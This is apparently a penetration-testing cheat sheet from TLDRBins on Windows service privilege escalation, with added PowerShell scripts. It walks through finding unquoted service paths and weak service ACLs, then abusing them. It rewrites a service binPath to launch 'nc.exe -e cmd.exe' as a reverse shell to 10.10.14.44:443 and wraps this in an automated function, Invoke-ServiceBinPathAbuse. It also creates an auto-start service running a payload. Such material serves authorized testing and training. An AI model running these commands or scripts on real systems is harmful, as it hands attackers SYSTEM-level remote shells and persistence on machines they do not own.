TLDRBins / Windows Services



Check unquoted service path

cmd.exe /c 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """'

Sample Output:
PS C:\Users\user1> cmd.exe /c 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """'
WC Assistant  WCAssistantService  C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe  Auto

The three findstr filters keep auto-start services, drop anything under C:\Windows\, and drop paths that are already quoted. A hit is only a candidate: the path must contain a space, and you need write access to one of the directories CreateProcess searches before it reaches the real binary (for the path above: C:\ for "C:\Program.exe" and "C:\Program Files.exe", then C:\Program Files (x86)\Lavasoft\ for "Web.exe"). wmic is deprecated and absent on recent Windows builds; Get-CimInstance -ClassName Win32_Service returns the same fields.
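The one-liner only lists candidates. The following PowerShell is an added example (not code from TLDRBins) that does the rest of the check: it enumerates the same services without wmic, expands each unquoted path into the exact files CreateProcess would try first, and probes whether the current user can actually write to those directories. The function and variable names are this example's own choices, and the probe creates and immediately deletes an empty file in each directory it tests.

```powershell
# Added example, not from the TLDRBins page. Function names are assumptions for this snippet.

function Get-HijackCandidate {
    param([Parameter(Mandatory)][string]$PathName)
    # Drop any arguments: keep everything up to and including the first ".exe"
    $exe = if ($PathName -match '^(.*?\.exe)') { $Matches[1] } else { $PathName }
    $parts = $exe -split ' '
    # CreateProcess tries "C:\Program.exe", then "C:\Program Files.exe", ... before the real
    # binary, so every prefix that ends at a space is a file an attacker could plant
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Directory)
    # Probe with a real write instead of parsing ACLs: inheritance and group membership
    # make ACL arithmetic easy to get wrong, an actual CreateFile is not ambiguous
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ('probe_' + [guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePath {
    # Same criteria as the wmic|findstr chain: auto-start, not under C:\Windows, not quoted, has a space
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -and
                       $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and
                       $_.PathName -notmatch '^C:\\Windows\\' } |
        ForEach-Object {
            $svc = $_
            foreach ($cand in @(Get-HijackCandidate -PathName $svc.PathName)) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    PathName  = $svc.PathName
                    Candidate = $cand
                    Writable  = Test-DirectoryWritable -Directory (Split-Path -Parent $cand)
                }
            }
        }
}

# Show every candidate, then only the ones you can actually exploit
Find-UnquotedServicePath | Format-Table -AutoSize
Find-UnquotedServicePath | Where-Object Writable | Format-Table Service, RunsAs, Candidate -AutoSize
```

RunsAs is included because a writable candidate is only interesting if the service runs as something more privileged than you (usually LocalSystem). By default a standard user can create folders but not files directly under C:\, so the root-level candidates normally come back Writable = False; the Program Files subdirectories of third-party installers are where this check usually pays off.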

Check service ACLs

. .\Get-ServiceAcl.ps1

Sample Output: (none; dot-sourcing only loads the Get-ServiceAcl function into the current session)

"<SERVICE>" | Get-ServiceAcl | Select -ExpandProperty Access

Sample Output:
PS > "SomeService" | Get-ServiceAcl | select -ExpandProperty Access
...[SNIP]...
ServiceRights     : QueryConfig, ChangeConfig, QueryStatus, EnumerateDependents, Start, Stop, Interrogate, ReadControl
AccessControlType : AccessAllowed
IdentityReference : COMPUTER-MS01\user
IsInherited       : False
InheritanceFlags  : None
PropagationFlags  : None
...[SNIP]...

ChangeConfig granted to a non-admin identity is the finding: it lets that user rewrite the binary path (Abuse #1 below). WriteDac or WriteOwner are equivalent, since either can be used to grant yourself ChangeConfig. Start and Stop on their own only matter once the path has been changed by some other means (for example an unquoted or writable binary).

Ref: Get-ServiceAcl.ps1
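When Get-ServiceAcl.ps1 cannot be brought onto the host, the same information is available from the built-in sc.exe sdshow, which prints the service's security descriptor as SDDL. The following PowerShell is an added example (not the page's Get-ServiceAcl.ps1, though it decodes the same data): it parses the SDDL with the .NET RawSecurityDescriptor class, maps each ACE's access mask onto the service-specific rights from winsvc.h, and flags the rights that allow a takeover. The function names and the choice of which rights count as dangerous are this example's own.

```powershell
# Added example, not from the TLDRBins page or from Get-ServiceAcl.ps1.

# Service-specific access rights, values from winsvc.h
$ServiceRights = [ordered]@{
    QueryConfig = 0x0001; ChangeConfig = 0x0002; QueryStatus = 0x0004; EnumerateDependents = 0x0008
    Start = 0x0010; Stop = 0x0020; PauseContinue = 0x0040; Interrogate = 0x0080; UserDefinedControl = 0x0100
    Delete = 0x10000; ReadControl = 0x20000; WriteDac = 0x40000; WriteOwner = 0x80000
}
# Any one of these lets the holder replace the service binary or take over the service object
$Dangerous = @('ChangeConfig', 'WriteDac', 'WriteOwner', 'GenericAll')

function ConvertTo-ServiceRight {
    param([Parameter(Mandatory)][int]$AccessMask)
    $names = @(foreach ($k in $ServiceRights.Keys) { if ($AccessMask -band $ServiceRights[$k]) { $k } })
    # GENERIC_ALL occasionally appears in service DACLs; flag it rather than silently dropping it
    if ($AccessMask -band 0x10000000) { $names += 'GenericAll' }
    return $names
}

function Get-ServiceDacl {
    param([Parameter(Mandatory)][string]$Name)
    # `sc` alone is PowerShell's Set-Content alias, so call the binary explicitly
    $sddl = & sc.exe sdshow $Name | Where-Object { $_ -match '\(' } | Select-Object -First 1
    if (-not $sddl) {
        Write-Warning "sc.exe sdshow $Name returned no SDDL (unknown service or access denied)"
        return
    }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor ($sddl.Trim())
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.KnownAce]) { continue }
        $rights = ConvertTo-ServiceRight -AccessMask $ace.AccessMask
        # Resolve the SID to a name; fall back to the raw SID for deleted or foreign principals
        try   { $who = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $who = $ace.SecurityIdentifier.Value }
        [pscustomobject]@{
            Service   = $Name
            Identity  = $who
            Type      = $ace.AceType
            Rights    = $rights -join ', '
            Dangerous = ($ace.AceType -eq 'AccessAllowed') -and [bool]@($rights | Where-Object { $_ -in $Dangerous })
        }
    }
}

# One service, every ACE (same view as Get-ServiceAcl's Access property)
Get-ServiceDacl -Name 'VSS' | Format-Table -AutoSize

# Every service, only ACEs that hand takeover rights to something other than the usual admin principals
Get-Service | ForEach-Object { Get-ServiceDacl -Name $_.Name } |
    Where-Object { $_.Dangerous -and $_.Identity -notmatch 'SYSTEM|Administrators|TrustedInstaller' } |
    Format-Table Service, Identity, Rights -AutoSize
```

The exclusion regex in the last pipeline is deliberately loose; review anything it lists against your own group memberships (whoami /groups), since an ACE for Authenticated Users or a local group you belong to is what turns a listing into a privilege escalation.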

Abuse #1: Change service path

1. Change service path

# Assume nc.exe is uploaded
sc.exe config <SERVICE> binPath= "C:\ProgramData\nc.exe -e cmd.exe <LOCAL_IP> <LOCAL_PORT>"

Sample Output:
*Evil-WinRM* PS C:\windows\tasks> sc.exe config VSS binpath="C:\windows\tasks\nc.exe -e cmd 10.10.14.44 443"
[SC] ChangeServiceConfig SUCCESS

2. Restart service

# Stop service
sc.exe stop <SERVICE>

Sample Output:
*Evil-WinRM* PS C:\windows\tasks> sc.exe stop VSS
[SC] ControlService FAILED 1062: The service has not been started.

# Start service
sc.exe start <SERVICE>

Sample Output:
*Evil-WinRM* PS C:\windows\tasks> sc.exe start VSS
[SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion.

Both errors are expected. 1062 only means the service was not running, so there was nothing to stop. 1053 is returned because nc.exe never registers with the Service Control Manager; by the time the error is printed the payload has already executed and the reverse shell should have connected. The SCM terminates the process once its start timeout expires (ServicesPipeTimeout, 30 seconds by default), so either use the shell quickly for something persistent (add a user, drop a second payload) or have the payload spawn a detached child, e.g. binPath= "cmd.exe /c start C:\ProgramData\nc.exe -e cmd.exe <LOCAL_IP> <LOCAL_PORT>".
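The two steps above as one PowerShell function, added here as an example and not taken from the page: it records the original binPath before touching anything so the service can be put back, treats 1062 on stop and 1053 on start as the expected results they are, and optionally restores the configuration afterwards. The function name, parameter names and the sample payload are this example's own.

```powershell
# Added example, not from the TLDRBins page. Names are assumptions for this snippet.
function Invoke-ServiceBinPathAbuse {
    param(
        [Parameter(Mandatory)][string]$Service,
        [Parameter(Mandatory)][string]$Payload,   # e.g. 'C:\ProgramData\nc.exe -e cmd.exe 10.10.14.44 443'
        [switch]$Restore
    )
    $orig = (Get-CimInstance -ClassName Win32_Service -Filter "Name='$Service'").PathName
    if (-not $orig) { throw "Service '$Service' not found" }
    Write-Host "[*] Original binPath: $orig"

    # Note the space after 'binPath=': sc.exe parses 'option= value' as two tokens
    & sc.exe config $Service binPath= $Payload | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "ChangeServiceConfig failed ($LASTEXITCODE): no SERVICE_CHANGE_CONFIG on $Service?" }

    # 1062 (not running) is fine; anything else is worth a look
    & sc.exe stop $Service | Out-Null
    if ($LASTEXITCODE -notin @(0, 1062)) { Write-Warning "stop returned $LASTEXITCODE" }

    # A payload that is not a real service never reports STARTED, so the SCM returns 1053
    # after ServicesPipeTimeout (30 s default) and then kills the process. The payload has
    # already run by then: 1053 here means "launched", not "failed".
    & sc.exe start $Service | Out-Null
    switch ($LASTEXITCODE) {
        0       { Write-Host "[+] started (payload behaves like a service)" }
        1053    { Write-Host "[+] payload launched; SCM timed out as expected" }
        default { Write-Warning "start returned $LASTEXITCODE" }
    }

    if ($Restore) {
        # Re-issue the stored PathName so the service is not left pointing at the payload
        & sc.exe config $Service binPath= $orig | Out-Null
        Write-Host "[*] binPath restored (sc.exe exit code $LASTEXITCODE)"
    }
    return $orig
}

# Detach nc.exe from the service process so the shell survives the SCM killing it
Invoke-ServiceBinPathAbuse -Service 'VSS' -Restore `
    -Payload 'cmd.exe /c start C:\ProgramData\nc.exe -e cmd.exe 10.10.14.44 443'
```

sc.exe returns the Win32 error as its exit code, which is what the function inspects through $LASTEXITCODE. Restoring the path does not restore a service you stopped; on an engagement note the original state (sc.exe qc <SERVICE> and sc.exe query <SERVICE>) before the first change.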

Additional: Create service

# Create a service (needs SC_MANAGER_CREATE_SERVICE on the Service Control Manager, which by default only administrators hold)
sc.exe create <NEW_SERVICE> binPath= C:\ProgramData\rev.exe start= auto

Sample Output: TO-DO

Note: sc.exe expects a space after each named argument (binPath= <value>, start= auto): the option name including the = is one token and the value is the next. Use this form from both cmd.exe and PowerShell, and quote the value if it contains spaces.